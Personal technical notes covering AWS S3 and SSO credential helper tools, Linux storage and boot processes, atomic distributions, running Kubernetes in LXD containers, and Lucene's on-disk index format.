| Not replicated | Existing objects (need S3 Batch), lifecycle actions, objects in Glacier/Deep Archive |
| Delete behavior | Delete markers can be replicated (optional), version deletes not replicated |
| Replication Time Control (RTC) | 99.99% within 15 minutes (SLA) |
| Batch Replication | Replicate existing objects, failed replications |

Two-way replication

  • Enable bidirectional replication between buckets
  • Prevents replication loops automatically

Security

Encryption at Rest

| Type | Key Management | Performance |
|---|---|---|
| SSE-S3 | AWS managed (AES-256) | No impact |
| SSE-KMS | AWS KMS keys | KMS API limits apply |
| SSE-C | Customer-provided keys | Customer manages keys |
| Client-side | Encrypt before upload | Customer responsibility |
  • Bucket default encryption: Applied to new objects without specified encryption
  • Enforce encryption: Use bucket policy to deny unencrypted uploads
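A minimal sketch of such a deny policy (the bucket name is a placeholder; the value would be AES256 or aws:kms depending on which algorithm you enforce):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyUnencryptedUploads",
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:PutObject",
      "Resource": "arn:aws:s3:::example-bucket/*",
      "Condition": {
        "StringNotEquals": {"s3:x-amz-server-side-encryption": "aws:kms"}
      }
    }
  ]
}
```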

Encryption in Transit

  • SSL/TLS (HTTPS) endpoints available
  • Enforce with bucket policy: aws:SecureTransport condition

Access Control

Priority order: Explicit DENY → Explicit ALLOW → Implicit DENY

| Method | Scope | Use Case |
|---|---|---|
| IAM Policies | User/role level | Control who can access S3 |
| Bucket Policies | Bucket level | Cross-account, public access, IP restrictions |
| ACLs (legacy) | Bucket/object level | Simple permissions (avoid for new implementations) |
| Access Points | Subset of bucket | Simplify permissions for shared datasets |
| Presigned URLs | Object level | Temporary access without credentials |

Block Public Access (BPA)

  • Four settings: Block public ACLs, Ignore public ACLs, Block public policies, Restrict public buckets
  • Applied at account or bucket level
  • Overrides bucket policies and ACLs

S3 Access Points

  • Named network endpoints with dedicated policies
  • Each access point has own DNS name
  • Supports VPC-only access
  • Simplifies managing access for shared datasets
  • Can restrict to specific VPC/VPCE

Event Notifications

Destinations: SNS, SQS, Lambda, EventBridge

Events:

  • Object created (PUT, POST, COPY, CompleteMultipartUpload)
  • Object deleted, restored
  • Replication events
  • Lifecycle events
  • Intelligent-Tiering changes

EventBridge advantages:

  • Advanced filtering (JSON rules)
  • Multiple destinations
  • Archive, replay events
  • 18+ AWS service targets

S3 Directory Buckets

  • New bucket type optimized for high performance
  • Used with S3 Express One Zone storage class
  • Single-digit millisecond latency
  • Up to 100GB/s throughput per bucket
  • Consistent hashing for predictable performance
  • Different naming: bucket-name--azid--x-s3

Performance

Multipart Upload

  • Required for objects > 5GB
  • Recommended for objects > 100MB
  • Parts: 1-10,000 parts, 5MB-5GB each (except last)
  • Benefits: Parallel uploads, pause/resume, start before knowing final size
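The part limits above imply some sizing arithmetic; a small sketch (the helper name is mine, the numbers come from the limits listed):

```python
import math

MIN_PART = 5 * 1024**2   # 5 MiB minimum part size (except for the last part)
MAX_PARTS = 10_000       # hard limit on parts per multipart upload

def choose_part_size(object_size: int) -> int:
    """Smallest part size (rounded up to a whole MiB) that keeps the upload
    under the 10,000-part limit while respecting the 5 MiB minimum."""
    part = max(MIN_PART, math.ceil(object_size / MAX_PARTS))
    return math.ceil(part / 1024**2) * 1024**2

# A 5 TiB object (the S3 maximum) needs parts of at least 525 MiB
print(choose_part_size(5 * 1024**4) // 1024**2)   # 525
```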

Transfer Acceleration

  • Uses CloudFront edge locations
  • URL: bucket-name.s3-accelerate.amazonaws.com
  • Up to 50-500% faster for global users
  • Additional cost per GB
  • Test speed: AWS provides comparison tool

Performance Baseline

  • 3,500 PUT/COPY/POST/DELETE requests per second per prefix
  • 5,500 GET/HEAD requests per second per prefix
  • No limit on prefixes per bucket
  • Spread objects across prefixes for higher throughput
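One common way to spread objects across prefixes is to prepend a short deterministic hash to each key; a sketch, assuming the key layout is free to change:

```python
import hashlib

def spread_key(key: str, fanout_chars: int = 2) -> str:
    """Prefix the key with a short, deterministic hash so objects spread
    across 16**fanout_chars prefixes (e.g. 256 prefixes for 2 hex chars)."""
    h = hashlib.md5(key.encode()).hexdigest()[:fanout_chars]
    return f"{h}/{key}"

# Sequential keys like logs/2024/01/... all land in one prefix;
# hashed prefixes distribute them across many.
print(spread_key("logs/2024/01/app.log"))
```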

Byte-Range Fetches

  • Request specific byte ranges of object
  • Parallelize downloads
  • Resilient to network failures (retry smaller range)
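The parallel-download idea can be sketched by generating the Range header values (the bytes=start-end form, with inclusive ends) for each chunk:

```python
def byte_ranges(size: int, chunk: int):
    """Yield HTTP Range header values covering an object of `size` bytes."""
    for start in range(0, size, chunk):
        end = min(start + chunk, size) - 1   # Range ends are inclusive
        yield f"bytes={start}-{end}"

# Each range can be fetched concurrently and reassembled in order;
# a failed range is retried without redownloading the whole object.
print(list(byte_ranges(10, 4)))   # ['bytes=0-3', 'bytes=4-7', 'bytes=8-9']
```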

S3 Select & Glacier Select

  • Retrieve subset of data using SQL
  • Filter at S3 side (up to 400% faster, 80% cheaper)
  • Works with CSV, JSON, Parquet
  • Supports compression (GZIP, BZIP2)

AWS EC2

EC2 instance types

Instance type names are composed of 4 components:

  1. Instance family: The primary purpose of the instance.
  2. Generation: Version number; higher is newer, faster, and usually cheaper for the same performance.
  3. Additional capabilities: Information about additional hardware capabilities, like CPU brand, networking optimization, ...
  4. Service-related prefix/suffix: The service owning the instance (e.g. rds, search, cache...)
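As an illustration, the naming scheme can be parsed with a small regex (a simplified sketch; exotic names like u-6tb1.metal won't match):

```python
import re

# family letters, generation digit(s), optional capability letters, then size
PATTERN = re.compile(r"^([a-z]+?)(\d+)([a-z-]*)\.(\w+)$")

def parse_instance_type(name: str) -> dict:
    m = PATTERN.match(name)
    if not m:
        raise ValueError(f"unrecognized instance type: {name}")
    family, gen, caps, size = m.groups()
    return {"family": family, "generation": int(gen),
            "capabilities": list(caps), "size": size}

print(parse_instance_type("m7g.large"))
# {'family': 'm', 'generation': 7, 'capabilities': ['g'], 'size': 'large'}
```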

Common Instance families

| Family | Letter | What It's Optimized For | Common Use Cases |
|---|---|---|---|
| General Purpose | T (Burstable) | Low baseline CPU with "burst" capability. | Dev/test servers, blogs, small web apps. |
| General Purpose | M (Main / Balanced) | A balanced mix of CPU, Memory, and Network. | Most applications, web servers, microservices. |
| Compute Optimized | C (Compute) | High CPU power relative to memory (RAM). | Batch processing, media transcoding, game servers. |
| Memory Optimized | R (RAM) | A large amount of Memory relative to CPU. | Databases (RDS), in-memory caches (ElastiCache). |
| Storage Optimized | I / D (I/O, Dense) | Extremely high-speed local disk I/O. | NoSQL databases, search engines (Elasticsearch). |
| Accelerated Computing | G / P (Graphics / Parallel) | Hardware accelerators (GPUs). | AI/Machine Learning, 3D rendering. |

Common Additional capabilities

| Capability Letter | Meaning (Processor or Feature) |
|---|---|
| g | Graviton (AWS's custom ARM processors) |
| a | AMD processors |
| i | Intel processors (often omitted if default) |
| d | Local NVMe Storage (fast "instance store" drives) |
| n | Network Optimized (higher network bandwidth) |
| z | High Frequency (very fast single-core CPU) |

CloudFront

ACM certificates and CloudFront

To associate a custom SSL/TLS certificate with an Amazon CloudFront distribution, the certificate must be provisioned or imported in the US East (N. Virginia) us-east-1 region using AWS Certificate Manager (ACM). This requirement applies regardless of where your origins or users are located, as CloudFront’s global control plane operates out of N. Virginia. Certificates created in other regions (e.g., eu-west-1, us-west-2) will not be visible or selectable in the CloudFront console.

AWS SSO CLI Helpers

Content of the .aws files

  • config: Contains the configuration for all the profiles and sso-sessions. It only contains non-sensitive data.
  • credentials: Contains credentials for AWS accounts: keys in the case of key auth, and SSO session tokens in the case of SSO authentication.
  • cache: Stores temporary credentials (e.g. SSO session tokens), used to avoid re-authenticating on every CLI invocation.
  • cli: Contains cache and history for the CLI.

Profile sections use [profile profile_name] (e.g., [profile user1]; note the "profile" prefix, which distinguishes it from the credentials file).

credential_process = /opt/home/theodo/.local/bin/go-aws-sso assume -q -a 381491832352 -n Admin. This can be used in credentials file to use a command to get the credentials.

All these are overridden by these env variables:

AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY
AWS_SESSION_TOKEN
AWS_DEFAULT_REGION
AWS_PROFILE
AWS_CONFIG_FILE
AWS_SHARED_CREDENTIALS_FILE

What happens when I run aws configure sso

  • config: contains [profile profile-name] and [sso-session session-name]
  • sso/cache: contains files with cached tokens.
  • I need to learn about SSO in general to understand the different fields
  • credentials is never changed, since SSO uses refreshable tokens.
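For reference, the sections written by aws configure sso are shaped like this (all names, IDs and URLs below are placeholders):

```ini
# ~/.aws/config
[profile dev-admin]
sso_session = my-sso
sso_account_id = 111111111111
sso_role_name = AdministratorAccess
region = eu-west-1

[sso-session my-sso]
sso_start_url = https://example.awsapps.com/start
sso_region = eu-west-1
sso_registration_scopes = sso:account:access
```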

AWS SSO Helpers

go-aws-sso:

How it works

This has 3 sub-commands:

  • generate: creates a config file in XDG_CONFIG.
  • assume: takes an account_id and role_name and assumes that role.
  • refresh: refreshes the credentials; nothing happens if the credentials have not expired yet.

If the command is invoked without subcommands, it opens an interactive menu with all the accounts and roles to choose from.

There are 2 sets of files created:

  • config file: created by generate; contains the SSO instance URL and the region.
  • credentials: it has the regions and uses a credential_process helper that points to go-aws-sso assume. The latter fetches the SSO access token then uses it to call GetRoleCredentials for the specified role.
credential_process = /opt/home/theodo/.local/bin/go-aws-sso assume -q -a 339712704276 -n ReadOnly
  • sso/cache folder: it contains two files: access-token.json, which contains SSO credentials, and last-usage, which contains metadata about the currently (or most recently) used profile.

Deal breaker

The tool is simple and minimalist, but it does not work for a complex setup. It is a tool for connecting to whatever profile (account+role) we need, fast. It supports one SSO instance at a time and one profile at a time. In addition, it drifts a lot from the default aws cli behavior.

  1. It creates its own SSO cached credentials in its own format, and adds a new file last-usage.json.
  2. It does not rely on the .aws/config file.
  3. It creates a default .aws/credentials that points to assume, which generates temporary credentials.
  4. [Not Sure] The credentials are not cached anywhere, which means assume is called every time.

Pros

  • It works
  • Simple to use.
  • Single Go binary
  • Can run in headless mode (outputs the url instead of opening a new browser tab)

Cons

  • Supports only one SSO instance
  • Does not configure environment variables.
  • Does not adhere to the AWS SSO philosophy.
  • Weird and kind of opinionated! It uses the credentials file with SSO authentication, and it creates files and configs in its own format. -> The tool uses the AWS SSO API to fetch temporary credentials (Access Key ID, Secret Access Key, Session Token) for the chosen role. Then it either uses credential_process, which configures go-aws-sso as the credentials provider, or persist, which writes short-lived credentials (keys) into the credentials file.

ssosync

This is an awslabs tool that populates AWS SSO from G Suite.

aws-vault

A manager for AWS credentials. It stores the creds in the machine keystore (e.g. pass), and when invoked it uses STS to generate temporary credentials via the GetSessionToken or AssumeRole API calls.

Then it injects the temporary credentials into the process on aws-vault exec. Key difference: SSO commands are SSO-centric (federated access, no stored IAM keys needed), while aws-vault is credential-vault-centric (it stores IAM keys securely and creates temporary sessions). SSO is for identity federation; aws-vault is for credential isolation.

It does not match the use case.

awsesh

This is fairly new, written in Go as a TUI. It is almost the same as go-aws-sso, since it also uses the SSO API to generate temporary credentials and stores them in credentials.

How it works

It authenticates to the SSO instance and then creates the following files:

  • awsesh: contains information about the SSO instance and the account used.
  • awsesh-account: contains all the accounts and associated roles. It may be used for caching purposes.
  • awsesh-tokens: contains the tokens for the SSO instance.
  • credentials: contains static credentials generated when logging in to an account/role in awsesh.

Deal breaker

Although this one is prettier, it is almost the same as go-aws-sso. It is not for a complex setup; it is intended for daily use. It simplifies switching but is not configuration oriented. It is also opinionated and uses its own conventions instead of those of the native aws sso CLI. It has the same drawbacks as go-aws-sso, except that it uses static credentials, an approach go-aws-sso also supports.

Pros

  • TUI
  • Simple to use
  • Single Go Binary
  • Supports many SSO Orgs

Cons

  • No Documentation
  • New and kind of vibecoded
  • Opinionated and does not rely on the aws config file conventions themselves.
  • Supports only one profile (support for multiple profiles has since been added).

yawsso

This seems unmaintained (latest release in 2024). It is the same idea as go-aws-sso: it syncs SSO to regular AWS credentials.

:point_down_tone4::point_down_tone4: Generated by AI :point_down_tone4::point_down_tone4:

yawsso works by:

  1. Reading AWS config profiles – It parses your ~/.aws/config file to identify which profiles are using SSO (with sso_start_url, sso_region, sso_account_id, sso_role_name).
  2. Extracting cached SSO session – It finds the corresponding session in the ~/.aws/sso/cache/ files created by aws sso login.
  3. Calling AWS SSO OIDC APIs (via boto3/AWS SDK) – With that cached SSO access token, yawsso requests temporary AWS credentials (access key, secret, session token) for the given account and role, just like the CLI would internally.
  4. Writing credentials to legacy store – It then writes those credentials into the legacy ~/.aws/credentials file under the selected or mapped profile names (e.g., dev, prod, or foo if you rename).
  5. Optional extras – It can also export them into environment variables (-e), copy them to the clipboard, or refresh them automatically when expired (auto).

:point_up_2_tone4::point_up_2_tone4: Generated by AI :point_up_2_tone4::point_up_2_tone4:

aws-sso-util

How it works

It connects to the SSO instances and pulls all the profiles into the config file. Then it logs in once to the SSO instance, and when a profile is used by the aws CLI, the SSO API is used to get credentials.

The behavior is the closest you can get to the native SSO CLI.

Pros

  • Use the same features as the native aws sso cli
  • Manages .config file instead of adding new files
  • Login once and switch between the accounts
  • Simple to use.
  • It adds a credential-helper in the config file for AWS SDKs that don't support SSO.
  • It has a lib

Cons

  • The configure command does not support the latest .aws/config format, so it cannot infer SSO information from it.
  • configure does not take the information from the CLI interactively. It supports providing the SSO fields through environment variables, inference from the aws config file, or command line options (-u and --sso-region).
  • Weak support for multiple SSO instances: if 2 instances have the same account, the second configure overrides the first.

aws-sso-cli

Powerful aws-sso tool, intended to replace the aws cli altogether.

How it works

aws-sso-cli differs a lot from the vanilla aws cli. It relies on a YAML file in XDG_CONFIG_HOME. The config is generated by the setup command and contains the SSO instance configuration as well as the CLI configuration. It also creates other files:

  • config.yaml: see above
  • cache.json: contains cached roles (with accounts and aliases)
  • secure/: a folder with encrypted credentials.

Deal Breaker

Simply put: it is too complex for me, and it is very opinionated.

  • It is very powerful and offers a lot of features and options, but it has its own way of doing things. As for me, I really want to be as minimalist as possible and rely on vanilla tools or tools that follow the standards of AWS tooling.
  • There is a lot to learn, and it offers many NON-STANDARD ways to do things (mainly assuming roles or connecting to profiles). Although it can be configured to follow aws cli v2 standards, I don't think it is worth it, at least at the stage I am at right now. Maybe in the future my workflow will become complex enough to require something like this tool.

Pros

  • Powerful
  • Very good documentation
  • Feature rich
  • Supports encryption for credentials

Cons

  • Complex
  • So opinionated! It replaces aws cli v2 entirely and comes with its own philosophy and interface.

AWSume: AWS Assume Made Awesome! | AWSume

This is more of a replacement for aws assume role.

References

Linux

Storage

SSDs

Types of SSDs:

  • Form Factors:
    • 2.5": looks like an HDD, slower, only supports SATA.
    • M.2: comes in a few standard lengths (60mm, 80mm, 110mm) and supports two interfaces:
      • SATA
      • PCIe (with and without NVMe support)
    • Add-in Card (AIC): bigger than M.2 and operates over PCIe.
    • mSATA: looks like M.2, very small.
    • U.2: looks like 2.5" but way faster. Mainly used in the enterprise (data centers).

NVME (Non-Volatile Memory Express):

  • A super fast way to access SSDs and flash memory (NVM).
  • NVMe is not an interface or a form factor (like SATA or PCIe) but a data transfer protocol.
  • SSDs evolved: SATA -> PCIe (lack of standards and features) -> NVMe

Lots of videos at the bottom of the page

PCIe

  • Each PCIe interface can be configured with 1 lane or multiple lanes (x4, x8, x16 and x32).
  • Each PCIe Generation doubles the bandwidth
  • PCIe is backward compatible (The interface and card settle on the lower version)
  • PCIe cards can be plugged into slots with a different number of lanes, with the consequence of reduced bandwidth or wasted lanes.
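The doubling rule can be sketched numerically (an approximation: roughly 250 MB/s usable per lane for Gen 1, ignoring the small encoding differences between generations):

```python
def pcie_bandwidth_mb_s(generation: int, lanes: int) -> float:
    """Approximate usable bandwidth: ~250 MB/s per lane for Gen 1,
    doubling with each generation."""
    return 250 * 2 ** (generation - 1) * lanes

print(pcie_bandwidth_mb_s(4, 16))   # a Gen 4 x16 slot: ~32000 MB/s
```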

Hard disk drive interface

  • PATA (IDE) - SCSI: old interfaces
  • SATA: personal HDDs, successor of PATA
  • SAS: enterprise HDDs, successor of SCSI
  • More and More

Disks and Partitions

partitioning formats

There are 2 well-known partitioning formats:

  • MBR: 2TB disk size limit; only 4 primary partitions can be created. The last one can be set as an extended partition, inside which we can create logical partitions.
  • GPT: No disk limit, no limit for partition size. The partition table information is available in multiple locations to guard against corruption. GPT can also write a “protective MBR” which tells MBR-only tools that the disk is being used.

/dev/sd* vs /dev/disk:

  • The Linux kernel decides which device gets which name (the /dev devices) on each boot, which can lead to confusion and unwanted behavior.
  • /dev/disk has many subfolders that point to the partitions using parameters other than the device name (label, id, uuid ...)
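This is why /etc/fstab entries usually use UUIDs or labels instead of kernel names; a sketch (the UUID, label and mount points are placeholders):

```
# /etc/fstab — stable identifiers survive device renaming across boots
UUID=0a3407de-014b-458b-b5c1-848e92a327a3  /      ext4  defaults  0 1
LABEL=data                                 /data  ext4  defaults  0 2
```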

Boot

BIOS

The BIOS in modern PCs initializes and tests the system hardware components (Power-on self-test), and loads a boot loader from a mass storage device which then initializes a kernel. In the era of DOS, the BIOS provided BIOS interrupt calls for the keyboard, display, storage, and other input/output (I/O) devices that standardized an interface to application programs and the operating system. More recent operating systems do not use the BIOS interrupt calls after startup.

Boot Sequence

  • System switched on, the power-on self-test (POST) is executed.
  • After POST, BIOS initializes the hardware required for booting (disk, keyboard controllers etc.).
  • BIOS launches the first 440 bytes (the Master Boot Record bootstrap code area) of the first disk in the BIOS disk order.
  • The boot loader's first stage in the MBR boot code then launches its second stage code (if any) from either:
    • Next disk sectors after the MBR, i.e. the so-called post-MBR gap (only on an MBR partition table),
    • A partition's or a partitionless disk's volume boot record (VBR),
    • For GRUB on a GPT partitioned disk—a GRUB-specific BIOS boot partition (it is used in place of the post-MBR gap that does not exist in GPT).
  • The actual boot loader is launched.
  • The boot loader then loads an operating system by either chain-loading or directly loading the operating system kernel.

UEFI

UEFI launches EFI applications, e.g. boot loaders, boot managers, UEFI shell, etc. These applications are usually stored as files in the EFI system partition. Each vendor can store its files in the EFI system partition under the /EFI/vendor_name directory. The applications can be launched by adding a boot entry to the NVRAM or from the UEFI shell.

Boot Sequence

  • System switched on, the power-on self-test (POST) is executed.
  • After POST, UEFI initializes the hardware required for booting (disk, keyboard controllers etc.).
  • Firmware reads the boot entries in the NVRAM to determine which EFI application to launch and from where (e.g. from which disk and partition).
  • A boot entry could simply be a disk. In this case the firmware looks for an EFI system partition on that disk and tries to find an EFI application at the fallback boot path \EFI\BOOT\BOOTx64.EFI (BOOTIA32.EFI on systems with an IA32 (32-bit) UEFI). This is how UEFI bootable removable media work.
  • Firmware launches the EFI application.
    • This could be a boot loader or the Arch kernel itself using EFISTUB.
    • It could be some other EFI application such as the UEFI shell or a boot manager like systemd-boot or rEFInd.
  • If Secure Boot is enabled, the boot process will verify authenticity of the EFI binary by signature.

Atomic Linux Distributions

Approaches to Immutability

Different distributions achieve "immutability" using distinct underlying architecture and tooling.

  • The "Git/Container" Model (OSTree / OCI)

    • Examples: Fedora Atomic, Universal Blue.
    • Tooling: rpm-ostree, bootc.
    • Mechanism: Treats the OS as a versioned repository or container image. Updates are fetched as file deltas or image layers and deployed to a new "deployment" directory on the same partition using hardlinks.
    • Key Trait: Centralized "DevOps" management; allows rebasing the entire OS to a different image/fork.
  • The "Snapshot" Model (Btrfs)

    • Examples: openSUSE Aeon (MicroOS).
    • Tooling: transactional-update.
    • Mechanism: Wraps standard package management. It creates a new read-write Btrfs snapshot of the current root, installs packages into it via zypper, and sets it as the default boot target.
    • Key Trait: Retains standard package management granularity but enforces a "reboot-to-apply" workflow.
  • The "A/B Partition" Model

    • Examples: Vanilla OS, Android, ChromeOS.
    • Tooling: ABRoot.
    • Mechanism: Uses two completely separate physical root partitions (Slot A and Slot B). Updates are written to the inactive partition (via OCI sync or package manager) which is then toggled active for the next boot.
    • Key Trait: Maximum isolation. A failed update or filesystem corruption on the inactive slot has physically zero impact on the running system, at the cost of higher storage usage.

Atomic Linux & Universal Blue: Technical Reference

The Core Architecture

  • Bootable Containers: The OS is delivered as a standard OCI container image.
  • Kernel Management: The kernel is a package inside the container image. It is version-locked to the userspace.
  • Storage Model: Uses a single physical partition with "Deployments" (snapshots) sharing space via hardlinks (OSTree). It does not use A/B physical partitions (unlike Android or VanillaOS).

Universal Blue (uBlue) vs. Fedora

  • Fedora Atomic (e.g. Silverblue):

    • Uses Classic OSTree (Git-like file deltas) by default.
    • Constraint: Cannot ship proprietary drivers (NVIDIA) or codecs due to Red Hat legal/philosophical policies.
  • Universal Blue:

    • Builds on top of Fedora using GitHub Actions.
    • Mechanism: Wraps Fedora content into OCI images.
    • Bypass: Uses GitHub infrastructure to inject proprietary drivers/codecs that Fedora can't ship.

Tooling: rpm-ostree vs bootc

| Tool | Role | Notes |
|---|---|---|
| rpm-ostree | Legacy Client + Build Tool | Uses ostree-rs-ext to translate OCI layers into OSTree commits on disk. Still used inside Containerfiles to install packages. |
| bootc | Modern Client | The future standard. Treats the container registry as the single source of truth. |

System State & Mutability

| Directory | State | Behavior on Update |
|---|---|---|
| /usr | Read-Only | Completely replaced by the new image content. |
| /var | Read-Write | Preserved (Logs, Docker images, libvirt). |
| /home | Read-Write | Preserved. |
| /etc | Read-Write | 3-Way Merge: Compares (1) Old Default, (2) New Default, (3) User Edits. Tries to merge; user edits take precedence. |

Operations

Rebasing (Switching Distros)

You can switch entire OS flavors (e.g., Desktop to Gaming) by changing the image source.

# Example: Switch to Bazzite (SteamOS clone)
bootc switch ghcr.io/ublue-os/bazzite:latest

Risk: /home config clutter. Switching Desktop Environments (e.g., GNOME to KDE) can cause theming/config conflicts in dotfiles.

Custom Images (Blue-Build)

  • Workflow: Define OS in recipe.yml (YAML) → GitHub Actions builds the image → Device pulls updates from GHCR.
  • Benefit: Pre-install tools (Terraform, UV, Neovim) in the base image rather than layering them locally.

Recovery Mechanisms

  • Rollback: The previous OS version is always available in the GRUB menu.
  • Pinning: ostree admin pin 0 ensures a specific working deployment is never garbage collected.
  • Critical Failure: Since deployments share a partition, filesystem corruption (superblock) kills all deployments. Requires Live USB recovery.

References

Containers

Cgroups

Privileged access to Cgroups

CGroups can be accessed with various tools:

  • Systemd directives to set limits for services and slices.
  • Through the cgroup FS.
  • Through libcgroup binaries like cgcreate, cgexec and cgclassify.
  • The Rules engine daemon to automatically move certain users/groups/commands to groups (/etc/cgrules.conf and cgconfig.service).
  • Through other software like LXC.

Unprivileged access to Cgroups

Unprivileged users can divide resources using cgroups v2. The memory and pids controllers are supported out of the box; cpu and io require delegation.

  • To delegate cgroup resources we should add the Delegate systemd property, and reboot
# /etc/systemd/system/user@1000.service.d/delegate.conf
[Service]
Delegate=cpu cpuset io

Experiment running Kubernetes in LXD

Try 1: Kubernetes storage support

Kubernetes filesystem support

The hardest issue with deploying Kubernetes on LXD/LXC containers is storage and filesystem support:

BTRFS

BTRFS does not work well with Kubernetes, because cAdvisor does not play well with BTRFS.

ZFS

ZFS does not work well on LXC and Kubernetes either, since it has poor support for nested containers.

One workaround is creating subvolumes for the container runtime and formatting them in Ext4:

Another workaround is to have a ZFS-enabled containerd on the host and make it accessible inside LXC.

There are other solutions, like using the docker loopback plugin ...

Containerd and overlay inside LXC

When running containerd inside LXC, systemd is unable to execute modprobe overlay inside the container (the module is already loaded in the host kernel).

Containerd is already patched and modprobe errors are ignored.

Cgroups v2 support

Containerd (and runC) supports Cgroups v2 already

I enabled it using this

[plugins]
  [plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc]
    [plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc.options]
      SystemdCgroup = true

  [plugins.cri.containerd.default_runtime]
    runtime_type = "io.containerd.runc.v2"
    runtime_engine = ""
    runtime_root = ""

Try 2: Weird problem

I have a weird problem now: when setting up a cluster with kubeadm, the containers keep restarting until everything crashes. The same thing happens with microk8s.

An even weirder situation: k0s works fine!

Hypothesis

There is something related to container technologies that's preventing the containers from running properly.

  • In the case of Kubeadm, the kubernetes components run in containers (containerd in my case).
  • In the case of Microk8s, the components run on top of snapd (to be verified).

--> In this case there should be something preventing them (containers, snaps) from running properly.

To verify this I will do the following experiments

  • Run k3s in LXD; since it uses containerd to run the k8s components, it should fail.
  • Install Kubernetes the hard way; this way I'll install the components as processes, not as containers. In this case everything should work fine.

Edit: Microk8s works fine; the problem was related to the dns plugin, which was disabled for some reason. That is why Microk8s reported a not-running status. microk8s enable dns and everything is working fine.

Kubeadm downgrade

Downgraded kubeadm from 1.22.0 to 1.20.4 and everything seems to work fine!

This can be a version problem! Digging deeper and maybe getting some help from serverfault.

A new problem arose: kube-proxy won't start and fails with open /proc/sys/net/netfilter/nf_conntrack_max: permission denied

The solution was to set nf_conntrack_max in the host.

sudo sysctl net/netfilter/nf_conntrack_max=131072

Managed to upgrade from 1.20.4 to 1.21.4 to 1.22.1 and the cluster is running almost fine, until it isn't.

For 1.21.4 everything was fine while in 1.22.1 nothing works.

It started with some CrashLoopBackOffs and now everything is down.

When I restart the kubelet, the containers start to show up a minute later, and then enter the crash loop again.

My hypothesis is that this is a version issue: there is something wrong with v1.22, or with my lxd setup, or both. To test that I am doing the following:

  • Testing v1.22 using k3s or some other distribution.
  • Testing v1.22 with k8s the hard way.

Also v1.22 supports swap so maybe the problem has something to do with swap. I'll check that too:

Asked at k8s.slack.com and the responses suggested that the etcd server is the reason why everything fails, noting that from Kubernetes 1.21 to 1.22 etcd moved to 3.5.0.

The best and least time-consuming way is Kubernetes the hard way, since it will help me with other things as well. And since k8s distros haven't moved to 1.22 yet.

  • https://github.com/inercia/terraform-provider-kubeadm
  • Using Ansible + Terraform is maybe better

Try 3: New cluster

Going back to this project. This works on 1.31+ with a little bit of tweaking. It may work with previous versions, but I have not tested them. Initialized a cluster on 3 LXD container instances.

  • Created 3 LXD container instances using LXD terraform provider and cloud-init

It is weird that LXD cloud images for ubuntu/jammy do not come with sshd installed, so I had to install it manually.

  • Getting the annoying fs.go:595] Unable to get btrfs mountpoint IDs: stat failed on /dev/nvme0n1p3 with error: no such file or directory error. But apparently it does not affect the cluster health. See above for more information about the issue.
  • After initializing the cluster, the kube-proxy pod enters a CrashLoop state. kubectl logs shows that the container was failing with:
conntrack.go:100] Set sysctl 'net/netfilter/nf_conntrack_max' to 131072
server.go:495] open /proc/sys/net/netfilter/nf_conntrack_max: permission denied

Apparently kube-proxy tries to change the value of nf_conntrack_max even when it does not have the permission to do so. This is maybe related to the way LXC loads kernel modules (need to dig more into this).

root@k8s-node-0:~# sysctl -p
sysctl: setting key "net.netfilter.nf_conntrack_max": No such file or directory
sysctl: cannot stat /proc/sys/net/nf_conntrack_max: No such file or directory

The solution was to prevent kube-proxy from changing the nf_conntrack_max value by setting maxPerCore to 0 in the kube-proxy configMap. More
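For reference, the relevant fragment of the kube-proxy ConfigMap looks like this (a sketch; only the conntrack part matters here):

```yaml
# kubectl -n kube-system edit configmap kube-proxy
apiVersion: kubeproxy.config.k8s.io/v1alpha1
kind: KubeProxyConfiguration
conntrack:
  maxPerCore: 0   # 0 = leave the host's nf_conntrack_max untouched
```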

kubectl apply -f https://github.com/weaveworks/weave/releases/download/v2.8.1/weave-daemonset-k8s.yaml

References

ElasticSearch

Introduction to Lucene

Ingestion Process

  • Document Creation: User creates a Document object in memory. Data model: Map-like structure with Field objects (e.g., TextField for searchable text, StoredField for retrievable data). Stored in RAM as Java objects.
  • Analysis (Tokenization & Filtering): Tokenize (split into words), Normalize (lowercase, remove stopwords, stem words like "running" → "run").
  • Term Addition to Index: the terms are added to the in-memory index.
  • Segment Flushing: when the buffer fills, data is flushed to disk as a new immutable segment.
  • Commit & Merging: on commit, segments are merged (in the background) into larger ones for efficiency.
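The pipeline above can be sketched as a toy inverted index (simplified: a naive tokenizer, a hard-coded stopword list, no stemming and no positions):

```python
import re
from collections import defaultdict

STOPWORDS = {"is", "on", "to", "the"}

def analyze(text: str) -> list:
    """Tokenize, lowercase, drop stopwords (real analyzers also stem)."""
    return [t for t in re.findall(r"\w+", text.lower()) if t not in STOPWORDS]

def index(docs: dict) -> dict:
    """Build term -> postings (sorted doc IDs), like Lucene's in-memory buffer."""
    postings = defaultdict(set)
    for doc_id, text in docs.items():
        for term in analyze(text):
            postings[term].add(doc_id)
    return {t: sorted(ids) for t, ids in postings.items()}

idx = index({0: "Lucene stores documents", 1: "Elasticsearch is built on Lucene"})
print(idx["lucene"])   # [0, 1]
```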

Index Data model

Data model

ls -1 | cut -f2 -d. |sort | uniq
doc
dvd
dvm
fdm
fdt
fdx
fnm
lock
nvd
nvm
pos
segments_4
si
tim
tip
tmd

The most important files are tim, tip, doc and pos. The full model is the following

  • Vocabulary:

    • .tim: Terms Dictionary with All unique terms (words)
    • .tip: Terms Index Pointer/index into .tim
    • .doc: Postings - Frequencies
    • .pos: Postings - Positions
  • Stored Fields (Original Document Storage)

    • .fdt: Field Data - Actual stored field values (like a database)
    • .fdx: Field Index - Pointers to data in .fdt
    • .fdm: Field Metadata - Compression info (Describes field types, analyzers, norms, etc.)
  • Doc Values (Column-oriented Storage)

    • .dvd: Doc Values Data - For sorting/faceting
    • .dvm: Doc Values Metadata
  • Norms (Field Length Normalization)

    • .nvd: Norms Data - Field length info for scoring
    • .nvm: Norms Metadata
  • Metadata Files

    • .fnm: Field Names - Maps field IDs to names.
    • .si: Segment Info - Segment metadata (doc count, codec, version, deleted docs, etc.).
    • .tmd: Term Vector Metadata - For term vector storage. (Extra info for .tim and .tip.)
    • segments_4: Master file listing all segments (Lists all segments, their versions, and commit metadata.)
    • write.lock: Write lock (prevents concurrent writes)

Example

  • The document
# Document
0, "Hello World", "Lucene stores documents efficiently"
1, "Apache Lucene", "Lucene uses segments to store data"
2, "Search Engines", "Elasticsearch is built on Lucene"
  • Metadata files
# .fnm
